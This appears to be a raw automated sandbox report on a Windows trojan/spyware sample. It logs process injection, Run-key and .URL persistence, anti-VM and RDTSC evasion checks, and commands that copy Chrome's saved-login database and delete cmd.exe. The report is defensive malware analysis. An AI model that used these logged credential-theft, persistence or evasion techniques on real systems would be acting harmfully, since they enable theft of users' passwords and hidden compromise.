            Source: C:\Users\Public\Libraries\vrkamxjwJ.url, type: DROPPED Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9DBD2
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0EBB0
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA2B28
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA22AE
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF4120
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDF900
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA28EC
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BEB090
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C020A0
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA20A8
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91002
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CAE824
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA1FF1
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA2EF7
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF6E30
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9D616
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA25DD
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C02581
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BED5E0
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD0D20
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA1D55
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA2D07
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE841F
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9D466
            Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 03BDB150 appears 35 times
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C199A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C197A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C196E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C195D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C199D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C198F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C198A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C196D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19650 NtQueryValueKey,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19660 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C195F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19560 NtWriteFile,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1AD30 NtSetContextThread,
            Source: TR0627729920002.exe, 00000000.00000002.277070452.0000000002930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000002.278345155.000000007FCF5000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000003.257799024.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000002.277410487.00000000034A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000003.237403790.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000003.237626468.000000007FC97000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000002.279158959.000000007FE68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000003.239679096.00000000035D8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe, 00000000.00000003.239608511.0000000003544000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
            Source: TR0627729920002.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Jwjxmakrv.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: IconCachet0hh.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: IconCachet0hh.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: IconCachet0hh.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\TR0627729920002.exe Section loaded: system.dll
            Source: C:\Users\user\Desktop\TR0627729920002.exe Section loaded: system.dll
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Section loaded: system.dll
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Section loaded: system.dll
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Section loaded: system.dll
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Section loaded: system.dll
            Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe 3685495D051137B1C4EFDE22C26DF0883614B6453B762FA84588DA55ED2E7744
            Source: TR0627729920002.exe ReversingLabs: Detection: 29%
            Source: C:\Users\user\Desktop\TR0627729920002.exe File read: C:\Users\user\Desktop\TR0627729920002.exe
            Source: C:\Users\user\Desktop\TR0627729920002.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown Process created: C:\Users\user\Desktop\TR0627729920002.exe "C:\Users\user\Desktop\TR0627729920002.exe"
            Source: C:\Users\user\Desktop\TR0627729920002.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exe Process created: C:\Users\Public\Libraries\Jwjxmakrv.exe "C:\Users\Public\Libraries\Jwjxmakrv.exe"
            Source: C:\Windows\explorer.exe Process created: C:\Users\Public\Libraries\Jwjxmakrv.exe "C:\Users\Public\Libraries\Jwjxmakrv.exe"
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\cmd.exe"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
            Source: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\TR0627729920002.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Windows\explorer.exe Process created: C:\Users\Public\Libraries\Jwjxmakrv.exe "C:\Users\Public\Libraries\Jwjxmakrv.exe"
            Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\cmd.exe"
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
            Source: C:\Users\user\Desktop\TR0627729920002.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B091E540-83E3-11CF-A713-0020AFD79762}\InProcServer32
            Source: C:\Users\user\Desktop\TR0627729920002.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Jwjxmakrvkwfuijrnbpqlslhsyeopao[1]
            Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\P1bxx
            Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@23/8@36/13
            Source: C:\Users\user\Desktop\TR0627729920002.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\TR0627729920002.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Desktop\TR0627729920002.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:120:WilError_01
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4968:120:WilError_01
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_01
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_01
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_01
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01
            Source: C:\Users\user\Desktop\TR0627729920002.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\Desktop\TR0627729920002.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\Desktop\TR0627729920002.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: cmd.pdbUGP source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr
            Source: Binary string: wntdll.pdb source: cmd.exe, cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdb source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: rundll32.pdbGCTL source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: cmd.pdb source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr
            Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035B8007 push sp; iretd
            Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF45C pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0059 pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0452 pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF145 pushfd ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF37A pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0773 push FFFFFFD3h; ret
            Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF416 pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0012 push esp; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF707 pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D083E push FFFFFFBDh; ret
            Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CFFDD pushad ; retf
            Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF8D7 push esp; ret
            Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D06C5 push ecx; retf
            Source: IconCachet0hh.exe.7.dr Static PE information: section name: .didat
            Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe
            Source: C:\Users\user\Desktop\TR0627729920002.exe File created: C:\Users\Public\Libraries\Jwjxmakrv.exe

            Boot Survival

            Source: C:\Windows\SysWOW64\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI
            Source: C:\Users\user\Desktop\TR0627729920002.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Jwjxmakrv
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Users\user\Desktop\TR0627729920002.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\TR0627729920002.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 0000000050418C04 second address: 0000000050418C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 0000000050418F9E second address: 0000000050418FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000948C04 second address: 0000000000948C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000948F9E second address: 0000000000948FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\explorer.exe TID: 5744 Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D083E rdtsc
            Source: C:\Windows\SysWOW64\cmd.exe API coverage: 5.0 %
            Source: C:\Users\user\Desktop\TR0627729920002.exe Process information queried: ProcessInformation
            Source: explorer.exe, 00000007.00000000.389287152.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
            Source: Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
            Source: Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
            Source: explorer.exe, 00000007.00000000.318850727.0000000008290000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.374000446.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
            Source: explorer.exe, 00000007.00000000.281739270.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000007.00000000.360032038.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
            Source: explorer.exe, 00000007.00000000.355070759.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
